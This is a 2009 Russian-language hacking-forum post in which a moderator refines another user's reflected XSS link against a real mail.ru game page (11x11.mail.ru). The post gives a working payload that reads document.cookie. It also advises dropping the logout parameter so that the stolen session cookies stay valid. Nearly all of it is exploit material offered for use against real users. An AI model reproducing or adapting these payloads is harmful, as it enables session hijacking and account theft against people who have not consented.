23.11.2009, 10:17
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
Сообщение от Ruslan1817
http://11x11.mail.ru/?&url='%3E%3C''%3E%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&do=logout
работает тока у авторизированных !
так гораздо лучше
http://11x11.mail.ru/?&url="><script>alert(document.cookie)</script>
запрос do=logout в ссылке означает выход из почтового ящика, а мы знаем, что кукисы умирают, как только нажмешь Выход, поэтому последние строки do=logout из ссылки убери, иначе сохранять будешь мертвые кукисы....
Последний раз редактировалось satana-fu; 23.11.2009 в 10:21..
|
|
|